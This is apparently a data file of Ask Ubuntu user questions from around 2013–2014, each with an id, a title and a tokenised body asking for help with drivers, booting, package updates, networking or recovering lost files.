414058	file recovery software for ubuntu 13.10 32-bit	just a mont ago i copied pdf files from windows mount 'c : \ ' to linux os home folder . but since i was new to ubuntu.while resolving oerheating problem through installing drivers my ubuntu turned blank screen . so now i have installed ubuntu 13.10-32-bit again with bumblebee project.i have solved over heating problem .but my pdf files are lost . i want good file recovery software for ubuntu which can scan windows mount sda3 and recover those file ( 2.3gb ) . on linux partition 'c : \ ' drive is shown with name '2ee8844ce88413ed ' .
414063	radeon video driver related instability	i am experiencing instability which seems to be related to my video drivers . i have an hd 6970 video card and am using ubuntu 13.10 . if i use the open source ( radeon ) driver , the card runs hot ( > 70c idle ) and the fan is very loud . i tried enabling dpm with the radeon driver , and it helps somewhat with the heat/fan issue ( still not as good as the proprietary drivers though ) , but the system becomes instable during use , for example i could be browsing the web and the screen turns black/dark blue and i need to reboot . when using fglrx/fglrx-updates , i have an issue where sometimes after my monitor goes off and i wake it up , the screen is black except a thin streak of white at the top of the screen . i can then only hard reboot . i tried installing the drivers directly from amd , but had the same issue as with fglrx ( problems getting the monitor on after it shuts off ) i dual boot with windows 7 , and have had no problems with stability when using that os . i 'm not sure what else to try . any suggestions would be greatly appreciated !
414066	what purpose does this ppa file in sources.d serve and why did they create errors on apt-get update ?	earlier , i was getting the following error when execuing apt-get update : failed to fetch http : //ppa.launchpad.net/deb/dists/http/ppa/ubuntu/main/binary-i386/packages 404 not found i found the corresponding deb-src inside the file deb_http-ppa-precise.list within /ect/apt/sources.d/ containing the lines deb http : //ppa.launchpad.net/deb http/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/deb http/ppa/ubuntu precise main upon commenting out those lines , apt-get update ran without any reported errors . i 'm curious as to why these particular lines were the cause for the reported errors on update , and are the packages linked to that ppa important ?
414067	get back ubuntu data after reinstallation of windows	i found a similar question here , is there any easy way to get ubuntu back after reinstalling windows 8 ? but the description of the question seems too technical for me , so apologies for posting this again i reinstalled windows 8 with ubuntu 12.04 already present . now am not able to login into ubuntu . i believe that the data still exists . how can i get back to ubuntu and get my old data back. ? please help me . this is all the data i have in my hand .
414068	how do you format a micro sd card ?	i recently bought this micro sd card , and i think i am having trouble formating it . in my mp3 player , it says card error . so i took it to the computer . after clicking on the file icon , i clicked on the memory card . then , after clicking on it get this error message . can anyone help me with this problem ? thank you all in your efforts . i installed gparted but i am still having trouble . i got rid of the exclamation point though , and i think i found a clue . i got a new error message after clicking on the file system .
414076	xim and japanese/chinese input methods	i 'm using ubuntu 13.10 and i normally use băšpo keyboard layout which requires xim to work properly . i would like to be able to write in japanese and chinese . is there a simple method to use both xim and a japanese/chinese input and switch between them easily ?
414079	syncing/mirroring two partitions ( sata , usb ) : raid or not ?	my 12.04 ubuntu server has a 120go internal sata sda5 , ext4 partition . i also own a 500 go usb2 external hard-drive from which i could easily free 120 go . now , i 've been meaning to set up mirroring ( there is a lot of valuable data on this server for me ) so that my system could handle a disk failure without losing more than , let 's say , a couple of hours of work . for this reason , my question are : would raid-1 be an overkill , given that 1째 ) the usb hard drive might throttle the write-read rates ? 2째 ) as i said , i would be just fine with a system cloning every hour or so , and i do n't really mind a downtime in case of a single disk failure . i 've seen that dd is able to clone partition , and i could set up a cron-job for cheap mirroring , but is there a rsync-like dd that would exploit the fact that most of the data has not changed ? update i 'm of course talking here of a logical raid .
414085	how set aria2 with uget and autostart them with starting system ?	i want to setup aria2 plugin and uget app to use downloading with aria2 by uget ! and i want to do this autosetup and autostart by startup system . how i can do this ? thank you
414086	ubuntu keeps restarting while installing with alongside win 8 option	i am trying to install ubuntu 12.04 alongside with win 8.1 . i have downloaded the image and written to an usb and trying to install . i tried install ubuntu option . i am able to reach the install ubuntu along side with win 8 . but after that it restarts . everytime it keeps restarting at that point . any solution how to proceed further ? i have dell inspiron 15r 4gb ram and 500gb hdd . no secure boot .
414087	can not see any applications except the menu bar	i 'm running 13.10 in a virtual machine using parallels 9 . i recently installed some updates and was prompted to restart . now can not see any running application . i am able to see the menu bar on the side but it seems like there is just a black space where i would normally expect to see the application . http : //i.imgur.com/xhaicci.png - i ca n't post images so here 's the first screen shot the only thing that opens is the top icon and even it does not display correctly http : //i.imgur.com/veuyv3f.png - here is the only application which is working does anyone have any idea what could be causing this and how i can fix it ?
414089	installation of ubuntu which version do i use on my net book ?	i have a acer netbook with an intel atom which i have recently up graded to 2gig of ram . will the 64 bit version fo ubuntu give me more speed and functionality or just bog it down ? thanks .
414090	booting brings me to grub command line	what the title states . i know exactly how to load up my linux kernel and boot into linux from the grub command line , but i also have a windows partition . i do n't know how to boot into windows from the command line itself , and i also miss having a fancy graphical front end and use the up and down arrows to select the os i wish to boot in to .
414092	sun grid engine 's qmon -- `` can not convert string ... ''	i recently tried to run qmon ( from sun grid engine job queueing system ) and when i do , i get a bunch of warnings that look like this : warning : can not convert string `` intro '' to type pixmap warning : can not convert string `` toolbar_job '' to type pixmap warning : can not convert string `` toolbar_queue '' to type pixmap warning : can not convert string `` toolbar_submit '' to type pixmap warning : can not convert string `` toolbar_cplx '' to type pixmap warning : can not convert string `` toolbar_host '' to type pixmap warning : can not convert string `` toolbar_cluster '' to type pixmap warning : can not convert string `` toolbar_sched '' to type pixmap warning : can not convert string `` toolbar_calendar '' to type pixmap ... and then , when the gui finally appears , all of the icons are replaced by a small dot . i guess for some reason , the icons can not be shown . i tried to look for them in : /usr/share/gridengine/pixmaps/ and indeed , the *.xpm files are there . about half a year or so ago , it worked fine . i guess something happened to my system during an upgrade or update that changed things . any ideas on what i should be looking for ? any log files that could help me ? thank you ! ray ps : on ubuntu 13.10 .
414096	how to make chromium `` browse files '' always be sorted by `` date modified ''	i want to , when selecting files to upload , get the dialog to order the files by date of modification ( newers at the end ) , and not by name , as it is by default . i read this result in google : an issue marked as resolved , that brings me to the file_manager.js , with which i do n't know what to do . is it possible to make `` sort by date '' by default after all ? i 'm at ubuntu 12.04 .
414097	is it possible to create read-only live usb stick for ubuntu ?	is it possible to create bootable live usb stick with ubuntu that does not allow writing anything to it , similar to live cd ?
414098	will apt-get upgrade upgrade all my installed software ?	this question is probably already asked but i could not find clear answer . i am using lubuntu 13 . 10 . how do i fully update via terminal ? i do : sudo apt-get update -y sudo apt-get upgrade -y sudo apt-get dist-upgrade will these commands update my whole system ? if i download an outdated app , will it be updated from these commands ?
414099	how to temporarily disable xfce monitor power off via bash	i have set up my monitor to go off after some minutes of inactivity , but when watching an internet stream in a browser this is unwanted , thus i 'd like to have bash command that to disable ( and later re-enable ) the setting of `` power manager : settings for xfce power manager '' : entry on ac , tab monitor
414101	making boot usb on macbook pro , osx mavericks	i 'm trying to create a boot-usb that can be used to install ubuntu-12 onto an old macbook following the guide on the site ( http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx ) . i 'm not having much luck however , and even though i follow all the steps the usb never turns up when i 'm booting the computer ( and does n't show up on my macbook pro either ) . am i missing something or what can be done ? i 've tried a couple of different usbs , and all kinds of combinations of formatting , but it just does n't seem to work . anyone who can help ? best , magnus
414102	ubuntu 12.04 lts would not complete booting	ubuntu 12.04 lts installation dvd ( boot dvd was burn with iso recorder v2 using : ubuntu-12.04.3-desktop-i386.iso downloaded from www.ubuntu.com/download/desktop ) would not complete booting . shows ubuntu pink background but no menu , no mouse cursor . waited for an hour - nothing . windows explores shows all the files an directories on the dvd - all seems to be fine . checked the downloaded ubuntu-12.04.3-desktop-i386.iso with winmd5sum - ok . tried to check dvd integrity using ubuntu cd menu by pressing a key while booting . the menu shows up but does not respond to the keyboard including all the f1-f12 keys . neither responds to the mouse . actually the mouse cursor does not show up . on another computer the menu shows and responds , but no matter what i select , the cdrom keeps working hard but the screen goes black and i have now idea what is going on . what might be wrong and how shall i get round it ?
414105	how can i fix my gnome desktop / x server in ubuntu 13.10	i have been struggling with this since yesterday evening : i upgraded from 12.04 to 13.10 in steps using $ do-release-upgrade . since the last upgrade i got the `` low graphics mode '' screen with the options which i can not select because the mouse is gone and selecting with keyboard did not seem to work on that screen either . i got out of there with ctrl+alt+f1 . trying to fix the problem i have installed graphics drivers from amd i had already downloaded previously . when this did not fix the problem i just did $ apt-get install -- reinstall fglrx this did not help so i started messing with my desktop environments . i read somewhere to try reinstalling gdm but than i set that as default over lightdm which i was obviously using and then things got really fishy . i never got the low graphics mode screen again but only terminal . after installing gnome-session-fallback i had a graphical loading screen again on boot but this crashes and shows terminal login . i moved all my logs out of the default dir so i could see only the new ones . x.org shows some ee ( error ) that no compatible graphics card was found . i have ati mobility radeon 4570 in my laptop . as i said before i have tried installing the latest drivers . can anyone help me troubleshoot this problem further ?
414106	ubuntu crashes at login ( 12.04 using wubi )	i tried to install ubuntu 12.04 using the windows installer ( wubi ) then once it starts up . i hear the logon sound . then the logon sound loops and the system crashes with a purple screen . what can i do to fix this problem ?
414109	setting up shared development machine	i have a server machine that contains 10 users . os : ubuntu 12.04.3 lts 64bit these users are developers ( mainly web developers : html+js+php+mysql ) i allowed them to remote login through xrdp and vnc . now everything works fine but the problem in /var/www what is the suitable permission for this directory so they do n't have problems while sharing some code between them although they are n't root . all of them are simple users . i need to know if there is a secure way of letting them share source code and at the same time each one have its own repository . i welcome any idea .
414110	where 's my /usr/include/sys directory ?	i recently upgraded from kubuntu 12.04 to 13.04 , a complete reinstall . using gcc 4.7.3 . i compiled some programs to discover there is no /usr/include/sys directory . that is , types.h , stat.h , etc , are absent . they exist in the include/linux directory but not include/sys . what 's going on ?
414112	bumblebee with nvidia-331-updates . work with `` -- driver nvidia '' but wo n't work as service	i trying to set up bumblebee on ubuntu 12.04 . i also using last nvidia driver because 319 is n't available any more . this is my configuration files : /etc/bumblebee/bumblebee.conf : # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-331-updates pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-331-updates : /usr/lib32/nvidia-331-updates # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-331-updates/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau /etc/bumblebee/xorg.conf.nvidia : section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting may be needed in some platforms with more than one # nvidia card , which may confuse the proprietary driver ( e.g. , # trying to take ownership of the wrong device ) . also needed on ubuntu 13.04 . # busid `` pci:01:00:0 '' # setting probeallgpus to false prevents the new proprietary driver # instance spawned to try to control the integrated graphics card , # which is already being managed outside bumblebee . # this option does n't hurt and it is required on platforms running # more than one nvidia graphics card with the proprietary driver . # ( e.g . macbook pro pre-2010 with nvidia 9400m + 9600m gt ) . # if this option is not set , the new xorg may blacken the screen and # render it unusable ( unless you have some way to run killall xorg ) . option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection then i show you couple mystical things : first command : $ sudo /usr/sbin/bumblebeed -vv [ 4828.053052 ] [ debug ] found card : 01:00.0 ( discrete ) [ 4828.053093 ] [ debug ] found card : 00:02.0 ( integrated ) [ 4828.053103 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 4828.053656 ] [ info ] configured driver : nvidia [ 4828.053678 ] [ debug ] skipping auto-detection , using configured driver 'nvidia ' [ 4828.053743 ] [ debug ] bbswitch has been detected . [ 4828.053753 ] [ info ] switching method 'bbswitch ' is available and will be used . [ 4828.053762 ] [ debug ] active configuration : [ 4828.053770 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 4828.053778 ] [ debug ] x display : :8 [ 4828.053786 ] [ debug ] ld_library_path : [ 4828.053794 ] [ debug ] socket path : /var/run/bumblebee.socket [ 4828.053802 ] [ debug ] pidfile : /var/run/bumblebeed.pid [ 4828.053810 ] [ debug ] xorg.conf file : /etc/bumblebee/xorg.conf.driver [ 4828.053818 ] [ debug ] xorg.conf.d dir : /etc/bumblebee/xorg.conf.d [ 4828.053826 ] [ debug ] modulepath : [ 4828.053833 ] [ debug ] gid name : bumblebee [ 4828.053841 ] [ debug ] power method : auto [ 4828.053849 ] [ debug ] stop x on exit : 1 [ 4828.053857 ] [ debug ] driver : nvidia [ 4828.053865 ] [ debug ] driver module : nvidia [ 4828.053872 ] [ debug ] card shutdown state : 1 [ 4828.054045 ] [ debug ] process /sbin/modprobe started , pid 3031 . [ 4828.054143 ] [ debug ] hiding stderr for execution of /sbin/modprobe [ 4828.056711 ] [ debug ] sigchild received , but wait failed with no child processes [ 4828.056777 ] [ error ] module 'nvidia ' is not found . second command : $ sudo /usr/sbin/bumblebeed -vv -- driver nvidia [ 4742.214895 ] [ debug ] found card : 01:00.0 ( discrete ) [ 4742.214970 ] [ debug ] found card : 00:02.0 ( integrated ) [ 4742.215000 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 4742.215609 ] [ info ] configured driver : nvidia [ 4742.215660 ] [ debug ] skipping auto-detection , using configured driver 'nvidia' [ 4742.215885 ] [ debug ] process /sbin/modprobe started , pid 3023 . [ 4742.215981 ] [ debug ] hiding stderr for execution of /sbin/modprobe [ 4742.218520 ] [ debug ] sigchild received , but wait failed with no child processes [ 4742.218667 ] [ debug ] bbswitch has been detected . [ 4742.218730 ] [ info ] switching method 'bbswitch ' is available and will be used . [ 4742.218769 ] [ debug ] active configuration : [ 4742.218805 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 4742.218834 ] [ debug ] x display : :8 [ 4742.218871 ] [ debug ] ld_library_path : /usr/lib/nvidia-331-updates : /usr/lib32/nvidia-331-updates [ 4742.218908 ] [ debug ] socket path : /var/run/bumblebee.socket [ 4742.218949 ] [ debug ] pidfile : /var/run/bumblebeed.pid [ 4742.218981 ] [ debug ] xorg.conf file : /etc/bumblebee/xorg.conf.nvidia [ 4742.219010 ] [ debug ] xorg.conf.d dir : /etc/bumblebee/xorg.conf.d [ 4742.219040 ] [ debug ] modulepath : /usr/lib/nvidia-331-updates/xorg , /usr/lib/xorg/modules [ 4742.219074 ] [ debug ] gid name : bumblebee [ 4742.219102 ] [ debug ] power method : auto [ 4742.219136 ] [ debug ] stop x on exit : 1 [ 4742.219172 ] [ debug ] driver : nvidia [ 4742.219202 ] [ debug ] driver module : nvidia-331-updates [ 4742.219238 ] [ debug ] card shutdown state : 1 [ 4742.219431 ] [ debug ] process /sbin/modprobe started , pid 3024 . [ 4742.219517 ] [ debug ] hiding stderr for execution of /sbin/modprobe [ 4742.221990 ] [ debug ] sigchild received , but wait failed with no child processes [ 4742.222054 ] [ debug ] configuration test passed . [ 4742.222937 ] [ info ] /usr/sbin/bumblebeed 3.2.1 started [ 4742.223214 ] [ info ] switching dedicated card off [ bbswitch ] [ 4742.404703 ] [ info ] initialization completed - now handling client requests and it 's work ! i ca n't understand why first command is n't workable . in bumblebee.conf `` driver '' value is `` nvidia '' . why in first command it trying load driver module `` nvidia '' instead `` nvidia-331-updates '' ? both command must be workable or not . together . how to solve this issue ?
414113	broadcom wireless issue installing 13.10	my wireless card was supported by adding additional drivers during the live version of 13.10 but after installing ubuntu the wireless was n't available . trying to add additional drivers would n't work as the wireless was n't working . the question is why ca n't i install the drivers from the install dvd instead of from the internet ? after all , it worked with the live version but not after installing and rebooting . thanks , bob
414114	how to fix , having installed the wrong version of xbmcbuntu ?	i have just purchased a htpc and i installed `` xbmcbuntu-12.2.intel-nvidia '' on it as my operating system . the installation worked fine , and just when i wanted to log in i realized something was wrong , as i could n't open xbmc ... this was pretty annoying , because that was the whole reason i bought the htpc for ... now after a few days of whining about xbmcbuntu to my friends and asking for their help , i have realized that it was all just my mistake . : p this by installing the nvidia version instead of the amd version . now my question is how can i uninstall this version of xbmc ( aka my whoke operating system ) and can this hurth my pc in any way , or are there any better methods of fixing this stupid mistake ... ? thanks for heling in advance , if you helped at all !
414116	master pdf editor v1.9	i recently downloaded and installed `` master pdf editor '' on my laptop . i edited a pdf file attaching `` sticky notes '' and emailed it as an attachment to one of my contacts who is seeing the `` sticky notes '' icons but can not open them ! i then opened the emailed attachment on my desktop and sure enough the attachment opened . i 'm seeing the icons but i can not open them also ! i tried installing the app `` master pdf editor '' from ubuntu software center but it would not install . ubuntu 12.04 is the os on both my laptop and desktop ! can anyone help ? please note that i am a stranger to terminal use ! !
414117	bios lets to boot only once from a dvd	have made an ubuntu 12.04.3 installation dvd . i started booting ok but then hanged . i re-loaded , and since then bios seems to ignore that dvd although bios settings still show cd-rom as the 1st disk to boot . i repeated steps several times - same effect . made debian installation dvd - booted for the first time ok , let me play with live debian without installing . yet then re-booted , again bios started ignoring it . made another debian dvd using nero ( previously used imgburn ) - same story ! tried windows boot disk - works ok. on another pc all the three dvd are still bootable . it looks like every new linux dvd leaves some traces in that computer so that it will not let it enter for the second time . how one could account for this ? is there a remedy ? bios version is eu91510a.86a.0444
414120	terminal not opening in pinguy	i ca n't open the terminal using ctrl-alt-t . i have gone into the settings and reassigned the shortcut to something else , but it does n't work . then put it back to ctrl-alt-t but that did n't fix it . i also tried to create my own shortcut , but it did n't work . how can i fix this ?
414126	install drivers for nvidia geforce gt 630 on newly installed 13.10	i have tried several different tutorials during the last couple of days , all of them resulting in different states of nonworking computer and the need to reinstall ubuntu . now i need help . which is the right way to do it ? it is supposed to be a htpc , and the goal is to get video and sound output through hdmi instead of vga/analog that has been used before . ubuntu is reinstalling as i write this question and hopefully i have an answer here when the installation is finished .
414128	ubuntu with dell precision m6800	i am having trouble with using virtualbox on ubuntu 12.04 lts . i have a dell precision m6800 with 32 gb ram and an amd m6100 graphics card . when ever i start virtualbox and try to install a guest os the system freezes . any idea on how to resolve this ?
414129	unable to connect to wifi on my dell inspiron 5520	i am unable to connect to wifi through my dell inspiron 5520.it has a broadcom wifi . 08:00.0 network controller [ 0280 ] : brodcom corporation device [ 14e4:4365 ] ( rev 01 ) . kindly help me in how and where to download the driver and install it .
414131	i can not connect to my internet	i installed ubuntu 12.04 today , but i ca n't connect to the internet . i got a router , next to it another one to give the wireless signal , and i had a wireless dongle to receive the signal to my other pc . now this other pc , when i get into ubuntu , it shows only 2 connections while i used to see more through windows , and it wo n't connect to mine . i wan na know how to connect , and why it did n't connect in the first place .
414133	bookmarks under places not listing until i first access the windows drive they 're on	i have two bookmarks created under places to folders on my windows 7 drive . when i was on ubuntu 10.04 they would show under places instantly upon boot since i had the drive automount in the fstab . with ubuntu 12.04 my windows drive is automatically mounting and i see it listed under places as windows 7 , but none of the bookmarked folders show until i first click on the windows 7 drive . the second i do those bookmarks become available . how do i get them to show without having to first click to access the windows 7 drive ? thanks .
414136	can not access local hosts by name , but can by ip address	i 'm new to ubuntu and a novice in networking . i can not access the hosts on the local network by name from my freshly installed 13.10 ( no gui ) server . it is not configured as a dhcp server . i use a netgear r6300v2 for the dhcp server . i can ssh to the server by name ( unix3 ) from winpro7 ( 192.163.1.3 ) from the ssh session : i can ping to google.com i can not ping to winpro7 i can ping to 192.168.1.3 ( winpro7 ) dhclient is running ifconfig looks good ? here is the log from the ssh session where i tried to obtain all the relevant info =~=~=~=~=~=~=~=~=~=~=~= putty log 2014.02.01 09:49:39 =~=~=~=~=~=~=~=~=~=~=~= using username `` frank '' . frank @ unix3 's password : welcome to ubuntu 13.10 ( gnu/linux 3.11.0-15-generic i686 ) * documentation : https : //help.ubuntu.com/ system information as of sat feb 1 09:51:41 est 2014 system load : 0.04 processes : 95 usage of / : 1.4 % of 120.70gb users logged in : 1 memory usage : 2 % ip address for eth0 : 192.168.1.22 swap usage : 0 % graph this data and manage this system at : https : //landscape.canonical.com/ last login : sat feb 1 09:51:41 2014 from 192.168.1.3 frank @ unix3 : ~ $ ping google.com -c3 ping google.com ( 74.125.226.227 ) 56 ( 84 ) bytes of data . 64 bytes from lga15s29-in-f3.1e100.net ( 74.125.226.227 ) : icmp_seq=1 ttl=53 time=50.0 ms 64 bytes from lga15s29-in-f3.1e100.net ( 74.125.226.227 ) : icmp_seq=2 ttl=53 time=36.5 ms 64 bytes from lga15s29-in-f3.1e100.net ( 74.125.226.227 ) : icmp_seq=3 ttl=53 time=36.0 ms -- - google.com ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 2009ms rtt min/avg/max/mdev = 36.022/40.863/50.033/6.489 ms frank @ unix3 : ~ $ ping winpro7 -c3 ping : unknown host winpro7 frank @ unix3 : ~ $ ping 192.168.1.3 -c3 ping 192.168.1.3 ( 192.168.1.3 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.3 : icmp_seq=1 ttl=128 time=0.918 ms 64 bytes from 192.168.1.3 : icmp_seq=2 ttl=128 time=0.467 ms 64 bytes from 192.168.1.3 : icmp_seq=3 ttl=128 time=0.422 ms -- - 192.168.1.3 ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 2007ms rtt min/avg/max/mdev = 0.422/0.602/0.918/0.224 ms frank @ unix3 : ~ $ ifconfig /-a eth0 link encap : ethernet hwaddr 00:15:5d:01:04:3d inet addr:192.168.1.22 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :215:5dff : fe01:43d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4883 errors:0 dropped:0 overruns:0 frame:0 tx packets:1848 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:802381 ( 802.3 kb ) tx bytes:169483 ( 169.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:24 errors:0 dropped:0 overruns:0 frame:0 tx packets:24 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1664 ( 1.6 kb ) tx bytes:1664 ( 1.6 kb ) frank @ unix3 : ~ $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.1.1 frank @ unix3 : ~ $ ps -ef | grep dhclient root 762 1 0 09:26 ? 00:00:00 dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0 frank 1581 1445 0 09:49 pts/0 00:00:00 grep -- color=auto dhclient frank @ unix3 : ~ $ cat /var/lib/dhcp/dhclient.eth0.leases lease { interface `` eth0 '' ; fixed-address 192.168.1.22 ; option subnet-mask 255.255.255.0 ; option routers 192.168.1.1 ; option dhcp-lease-time 86400 ; option dhcp-message-type 5 ; option domain-name-servers 192.168.1.1 ; option dhcp-server-identifier 192.168.1.1 ; renew 5 2014/01/31 22:14:27 ; rebind 5 2014/01/31 22:14:27 ; expire 5 2014/01/31 22:14:27 ; } lease { interface `` eth0 '' ; fixed-address 192.168.1.22 ; option subnet-mask 255.255.255.0 ; option routers 192.168.1.1 ; option dhcp-lease-time 86400 ; option dhcp-message-type 5 ; option domain-name-servers 192.168.1.1 ; option dhcp-server-identifier 192.168.1.1 ; renew 0 2014/02/02 01:43:44 ; rebind 0 2014/02/02 11:26:27 ; expire 0 2014/02/02 14:26:27 ; } frank @ unix3 : ~ $ hostname unix3 frank @ unix3 : ~ $ sudo ufw status status : inactive frank @ unix3 : ~ $ sudo netstat -uap active internet connections ( servers and established ) proto recv-q send-q local address foreign address state pid/program name udp 0 0 * : bootpc * : * 762/dhclient udp 0 0 192.168.1.25 : netbios-ns * : * 833/nmbd udp 0 0 192.168.1.22 : netbios-ns * : * 833/nmbd udp 0 0 * : netbios-ns * : * 833/nmbd udp 0 0 192.168.1.2 : netbios-dgm * : * 833/nmbd udp 0 0 192.168.1.2 : netbios-dgm * : * 833/nmbd udp 0 0 * : netbios-dgm * : * 833/nmbd udp 0 0 *:28567 * : * 762/dhclient udp6 0 0 [ : : ] :32733 [ : : ] : * 762/dhclient frank @ unix3 : ~ $ exit logout any help would be appreciated
414138	screen goes black when trying to install ubuntu 12.04.3 lts on lenovo ideapad z510 with free dos	i 'm trying to install ubuntu 12.04.3 on a new laptop which came without any os . ( except free dos ) . the laptop is a lenovo ideapad z 510 with these specs : cpu : intel core i5-4200m , 2x 2.50ghz ram : 8gb ( 1x 8gb ) harddisk : 500gb sshd ( 8gb ssd-cache ) drive : dvd+/-rw dl graphic card : nvidia geforce gt 740m , 2gb , hdmi os : freedos the problem : shortly after the insallation of ubuntu starts , the screen goes completely blank/black . the display is off , there is not back light at all . these are some observations i made : while the display remains off , i can - at some point - hear that familiar ubuntu percussion-kind-of drums notification . and occasionally , when i try to plug in an external monitor , i can - on the external screen - see the familiar ubuntu background ( that redish-violet-organge thing ) , but nothing happens at all . when i , at some point , e.g . press the space-bar , 'enter ' or 'esc ' keys , i can hear that sometimes something is reacting to that ( dvd-drive 'roars ' or flashdrive changes blinking pattern ) . but it does not go any further than this . this is what i have tried so far : i used usb drives with these different versions : ubuntu 12.04.3 lts ( 64 bit-version 'ubuntu-12.04.3-desktop-amd64.iso ' ) ubuntu 12.04.3 lts ( 32 bit-version 'ubuntu-12.04.3-desktop-i386.iso ' ) ubuntu 12.10 ( 32 bit version 'ubuntu-12.10-desktop-i386.iso ' ) i used an image-dvd made from the 64 bit-version 'ubuntu-12.04.3-desktop-amd64.iso' on a flatmate 's windows-machine . there are two ways i have gone about the installation attempts : number one is : i opened bios and chose from the boot-sequencer to boot from usb or dvd-drive respectively . this strategy led me to the familiar screen with a tiny keyboard and a tiny human in a cricle at the bottom of the screen . then the screen went empty with a cursor blinking at the top-left corner before going completely dark/back/blank/without-any-light . number two is : i left the bios and boot-sequencer as it was , just took care that the usb flashsdrive was plugged in ( or dvd in the drive ) . then i always got this screen that is titled : '' gnu grub version 1.99-21ubuntu3.10 '' . underneath this title , there 's this frame that contais the 3 options : try ubuntu without installing install ubuntu check disc for defects whichever of the three above option i go for , the screen first goes grey/back lit and then completely dark/back/blank/without-any-light - as if it was switched off . if i do n't choose any of these options but hit the 'esc'-key , i always come to a screen that is also titled `` gnu grub version 1.99-21ubuntu3.10 '' . but underneath there 's no frame or anything . it simply says : '' minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > _ '' this is all and as detailed i can tell it . after the rearch i 've done so far , i assume it has to do with the graphic card . apparently there have been similar issues in the past however , they all had an existing os ( ubuntu or windows ) installed while dealing with booting-issues . however , i ca n't istall ubuntu . any help is very much appreciated ! thank you !
414139	adjusting default brightness upon boot	when i boot to ubuntu 12.04 , the back light on my display turns off and i have to press the increase brightness button 4 times to get it to the desired brightness . is there a terminal command i can input for a default brightness ?
414141	getting strange output from /var/lib/dpkg/lock	when i was installing updates , the ubuntu software center progress bar got stuck , so i opened the terminal and tried to view contents which were working by running the command : sudo lsof /var/lib/dpkg/lock and the result was this which i did n't understand : lsof : warning : ca n't stat ( ) fuse.gvfsd-fuse file system /run/user/1000/gvfs output information may be incomplete . any help will be appreciated .
414144	powermizer preferred mode drop-down menu disappeared from nvidia settings	i recently updated my nvidia drivers ( just accepted the automatic update ) on my 12.04 pc . powermizer preferred mode drop-down menu seems to have disappeared from nvidia settings and i can not set it to maximum quality anymore . this causes tearing when playing hd videos . does anyone know how to take controlo of powermizer or bring back the drop-down menu ? anyone running a 12.04 with latest updates who can check on their machine if the drop-down is still available ?
414145	after installing ubuntu-tweak my keyboard shortcuts are acting weirdly in gnome-flashback	i am running 13.10 , with gnome-flashback , and i installed ubuntu-tweak but my keyboard shortcuts are acting weird . for example , in chromium , ctrl+a goes to the beginning of the address bar . most are working fine though .
